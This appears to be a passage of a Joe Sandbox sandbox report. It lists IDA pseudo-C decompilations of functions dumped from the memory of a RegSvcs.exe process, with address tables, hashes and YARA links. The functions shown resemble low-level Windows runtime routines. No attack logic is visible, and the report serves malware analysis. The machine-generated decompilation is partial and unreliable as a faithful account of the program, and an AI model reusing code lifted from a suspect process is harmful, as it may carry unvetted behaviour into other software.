									_t89 =  *0x19b7b9c; // 0x0
									_t92 = L018E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01909910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E018CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0195E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0195E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E019095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0195b8d9
0x0195b8e4
0x00000000
0x0195b8e6
0x0195b8f3
0x0195b8f5
0x0195b8f5
0x0195b8f8
0x0195b920
0x0195b924
0x0195b936
0x0195b939
0x0195b93d
0x0195b948
0x0195b9a0
0x0195b9a0
0x0195b9a4
0x0195b9bf
0x0195b9c4
0x0195b9c6
0x0195b9cd
0x0195b9d1
0x0195bad4
0x0195bad8
0x0195bada
0x0195badc
0x0195badc
0x0195badf
0x0195bae0
0x0195bae2
0x0195bae4
0x0195baec
0x0195baee
0x0195baf0
0x0195baf0
0x0195baec
0x0195bafb
0x0195bafc
0x0195bafe
0x0195bb01
0x0195bb01
0x00000000
0x0195bb06
0x0195b9d7
0x0195b9db
0x0195b9db
0x0195b9de
0x0195b9de
0x0195b9e4
0x0195b9e7
0x0195b9ea
0x0195b9ec
0x0195b9ef
0x0195b9f3
0x0195ba1b
0x0195ba1b
0x0195ba23
0x0195ba24
0x0195ba27
0x0195ba2a
0x0195ba2b
0x0195ba2e
0x0195ba30
0x0195ba37
0x0195ba3f
0x0195ba9c
0x0195baa2
0x0195bb13
0x0195bb15
0x0195baae
0x0195baae
0x0195bab3
0x0195bab5
0x0195baba
0x0195bac8
0x0195bac8
0x0195baba
0x0195bacd
0x0195bacf
0x00000000
0x0195bacf
0x0195bb1a
0x00000000
0x0195bb1c
0x0195baa7
0x0195bb11
0x00000000
0x0195bb11
0x0195baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0195ba41
0x0195ba41
0x0195ba41
0x0195ba58
0x0195ba5d
0x0195ba62
0x00000000
0x00000000
0x0195ba64
0x0195ba67
0x0195ba68
0x0195ba69
0x0195ba6c
0x0195ba6f
0x0195ba71
0x0195ba78
0x0195ba80
0x00000000
0x00000000
0x0195ba90
0x0195ba90
0x0195ba97
0x00000000
0x0195ba97
0x0195b9f5
0x0195b9f7
0x0195b9f7
0x0195b9fa
0x0195ba03
0x0195ba07
0x0195ba0c
0x0195ba10
0x0195ba17
0x00000000
0x0195b9f7
0x0195b9a6
0x0195b9a8
0x0195b9af
0x0195b9b3
0x00000000
0x00000000
0x0195b9b9
0x00000000
0x0195b9b9
0x0195b94d
0x0195b98f
0x0195b995
0x0195b999
0x0195b960
0x0195b967
0x0195b968
0x0195b96a
0x00000000
0x0195b96a
0x0195b99b
0x0195b99e
0x00000000
0x00000000
0x00000000
0x0195b99e
0x0195b951
0x0195b954
0x0195b95a
0x0195b95e
0x0195b972
0x0195b979
0x0195b97d
0x0195b97f
0x0195b980
0x0195b982
0x0195b984
0x00000000
0x0195b984
0x00000000
0x0195b926
0x00000000
0x0195b926

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b36e1a60c6f7edc6c524be382e55567ccd9f44f1299318c3a41f2b53ee9f4f
Instruction ID: 1ddb5096037566ad89e69ee6e6a05e132cf7904c3c651eb46504c4518d8056a7
Opcode Fuzzy Hash: 51b36e1a60c6f7edc6c524be382e55567ccd9f44f1299318c3a41f2b53ee9f4f
Instruction Fuzzy Hash: 7D71F432200706AFE772CF19C845F66BBFAEB40725F144528EA5EA76E1DB71E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01946DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01946DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01946B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E018E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01909AE0();
					_t87 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0194795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0194795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0194795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0194795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L018E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01946B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01946B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01946B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01946B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E018E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01909AE0();
								L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L018E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L018E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L018E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L018E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01946dd4
0x01946dde
0x01946de1
0x01946de3
0x01946de6
0x01946de9
0x01946dec
0x01946def
0x01946df2
0x01946df5
0x01946dfe
0x01946e04
0x01946e09
0x01946e0d
0x01946e18
0x01946e1b
0x01946e22
0x01946e2d
0x01946e30
0x01946e36
0x01946e42
0x01946e4d
0x01946e50
0x01946e55
0x01946e5c
0x01946e6e
0x01946e5e
0x01946e67
0x01946e67
0x01946e73
0x01946e74
0x01946e77
0x01946e7c
0x01946e7d
0x01946e8e
0x01946e93
0x01946e9c
0x01946ea8
0x01946eab
0x01946eac
0x01946eb3
0x01946ecd
0x01946edc
0x01946ee2
0x01946ee5
0x01946ef2
0x01946efb
0x01946f01
0x01946f06
0x01946f0b
0x01946f11
0x01946f1a
0x01946f22
0x01946f26
0x01946f26
0x01946f33
0x01946f41
0x01946f44
0x01946f47
0x01946f54
0x01946f65
0x01946f77
0x01946f7c
0x01946f82
0x01946f91
0x01946f99
0x01946fa3
0x01946fae
0x01946fae
0x01946fba
0x01946fbb
0x01946fbc
0x01946fc1
0x01946fc2
0x01946fd3
0x01946fd8
0x01946fd8
0x01946fdf
0x01946fe8
0x01946fee
0x01946fee
0x01946ff5
0x01946ffb
0x01946ffb
0x01947004
0x00000000
0x0194700a
0x01947004
0x01946eb3
0x01946e9c
0x01947015

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: c90009d920ff53afa097ac1bd10911fb58b1399655c81fc74b9dda5d95573b64
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: A6717F71A00209EFDB15DFA8C984EEEBBF9FF89714F144569E509E7250DB30AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 018C52A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E018C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E018DEEF0(0x19b79a0);
					_t104 =  *0x19b8210; // 0x1392c58
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E018DEB70(_t93, 0x19b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01909890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E018DEEF0(0x19b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E018DEB70(0, 0x19b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1392c65
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E018FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E018DEEF0(0x19b79a0);
									__eflags =  *0x19b8210 - _t104; // 0x1392c58
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x19b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01944888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E018DEB70(_t95, 0x19b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E019095D0();
											L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E019095D0();
											L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E018DEB70(_t93, 0x19b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E019095D0();
										L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E019095D0();
										L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E018FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x018c52a5
0x018c52ad
0x018c52b0
0x018c52b3
0x018c52b7
0x018c52ba
0x018c52bf
0x018c52c4
0x018c52cc
0x00000000
0x00000000
0x018c52ce
0x018c52d9
0x018c52dd
0x018c52e7
0x018c52f7
0x018c52f9
0x018c52fd
0x01920dcf
0x01920dd5
0x01920dd6
0x01920dd7
0x01920dd8
0x01920dd9
0x01920dde
0x01920ddf
0x01920de0
0x01920de1
0x01920de2
0x01920de5
0x01920dea
0x01920dec
0x01920f60
0x01920f64
0x01920f70
0x01920f76
0x01920f79
0x01920f79
0x00000000
0x01920f64
0x01920df2
0x01920df7
0x01920e04
0x01920e0d
0x01920e0d
0x01920e10
0x01920e1a
0x01920e1c
0x01920e4c
0x01920e52
0x01920e61
0x01920e67
0x01920e6b
0x01920e70
0x01920e76
0x01920ed7
0x01920edc
0x01920ee0
0x01920ee6
0x01920eea
0x01920eed
0x01920ef0
0x01920ef3
0x01920ef6
0x01920ef9
0x01920efe
0x01920f01
0x01920f01
0x01920f0b
0x01920f12
0x01920f16
0x01920f18
0x01920f1b
0x01920f2c
0x01920f31
0x01920f31
0x01920f35
0x01920f39
0x01920f3a
0x01920f3c
0x01920f3f
0x01920f50
0x01920f55
0x01920f55
0x01920f59
0x018c52eb
0x018c52f1
0x018c52f1
0x01920e7d
0x01920e84
0x01920e88
0x01920e8a
0x01920e8d
0x01920e9e
0x01920ea3
0x01920ea3
0x01920ea7
0x01920eaf
0x01920eb3
0x01920eb9
0x01920eb9
0x01920ebc
0x01920ecd
0x01920ecd
0x00000000
0x01920eb3
0x01920e21
0x01920e2b
0x01920e2f
0x01920e30
0x01920e3a
0x01920e3f
0x01920e41
0x00000000
0x00000000
0x01920e47
0x00000000
0x01920e47
0x01920df9
0x01920dfe
0x00000000
0x00000000
0x00000000
0x01920dfe
0x018c5303
0x018c5307
0x00000000
0x018c5309
0x00000000
0x018c5309
0x018c5307
0x018c52e9
0x018c52e9
0x00000000
0x018c52e9
0x018c530e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c8a4c92aee590175ecaf75e4dc121314f1d5e1c84429df910708c2130d9585
Instruction ID: af0fdc0d9b3efa2d7cbbed109d9b1fec374ad02c427096ffaf8c2cf3e8f8a1e0
Opcode Fuzzy Hash: 54c8a4c92aee590175ecaf75e4dc121314f1d5e1c84429df910708c2130d9585
Instruction Fuzzy Hash: B451DB302057429FD721EF68C980B26BBE9FF90B10F14091EF49987691E770FA40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018F2AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x19b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x19b8208; // 0x19b8207
				_t8 = _t57 + 0x19b8208; // 0x19b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x19b8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x19b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x19b6d5c; // 0x7f100654
							_t72 =  *0x19b6d5c; // 0x7f100654
							_t75 =  *0x19b6d5c; // 0x7f100654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x19b6d5c; // 0x7f100654
							_t84 =  *0x19b6d5c; // 0x7f100654
							_t87 =  *0x19b6d5c; // 0x7f100654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0190F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x018f2ae4
0x018f2aec
0x018f2aef
0x018f2af4
0x018f2af7
0x018f2afd
0x018f2b92
0x018f2b92
0x018f2b97
0x018f2b9c
0x018f2b9c
0x018f2b03
0x018f2b06
0x018f2b09
0x018f2b09
0x018f2b0f
0x018f2b15
0x018f2b15
0x018f2b1b
0x018f2b1e
0x018f2b21
0x018f2b26
0x018f2b29
0x018f2b81
0x018f2b84
0x018f2c0e
0x018f2c15
0x018f2c24
0x018f2c24
0x018f2b8a
0x018f2b8a
0x018f2b8a
0x018f2b8a
0x018f2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x018f2b4a
0x018f2b4a
0x018f2b4d
0x018f2b53
0x00000000
0x00000000
0x018f2b55
0x018f2b58
0x018f2bb7
0x01935d1b
0x01935d37
0x01935d47
0x01935d53
0x018f2bbd
0x018f2bbd
0x018f2bbd
0x018f2bb7
0x018f2b5d
0x018f2c2f
0x01935d5b
0x01935d77
0x01935d87
0x01935d93
0x018f2c35
0x018f2c35
0x018f2c35
0x018f2c2f
0x018f2b65
0x018f2b9f
0x018f2ba2
0x018f2b67
0x018f2b67
0x018f2b69
0x018f2b6b
0x018f2b6e
0x018f2bc9
0x018f2bcc
0x018f2bcf
0x018f2bd4
0x018f2bd6
0x018f2bd6
0x018f2bdb
0x018f2c02
0x018f2c05
0x018f2c07
0x00000000
0x018f2c07
0x018f2be0
0x018f2c00
0x018f2c3f
0x018f2c3f
0x00000000
0x018f2c00
0x018f2be5
0x018f2be7
0x018f2bec
0x018f2bf4
0x018f2bf6
0x00000000
0x018f2bf6
0x018f2b70
0x018f2b76
0x018f2b2b
0x018f2b2b
0x018f2b2d
0x018f2b2f
0x018f2b32
0x018f2b35
0x018f2b3a
0x00000000
0x018f2b40
0x018f2b43
0x018f2b45
0x018f2b47
0x018f2b4a
0x018f2b4d
0x018f2b53
0x00000000
0x00000000
0x00000000
0x018f2b53
0x018f2b78
0x018f2b78
0x018f2b7b
0x018f2b7e
0x00000000
0x018f2b7e
0x018f2b76
0x018f2ba5
0x018f2ba5
0x018f2ba8
0x018f2bad
0x00000000
0x00000000
0x018f2baf
0x018f2baf
0x018f2bc2
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f2f604fa53f50929fe62b7eb4a0e6d8539f9734f8866783065d67d17b256ebc
Instruction ID: e33b3724c0f0705cb7350299720cb1b57fb67bd6c891f11e243227e44e9e01f5
Opcode Fuzzy Hash: 1f2f604fa53f50929fe62b7eb4a0e6d8539f9734f8866783065d67d17b256ebc
Instruction Fuzzy Hash: 2D519C76A00129CF8B18CF1CC8909BDB7B2FB88700719845EEE56EB365D734EA51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0198AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0198AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0198C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0198ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
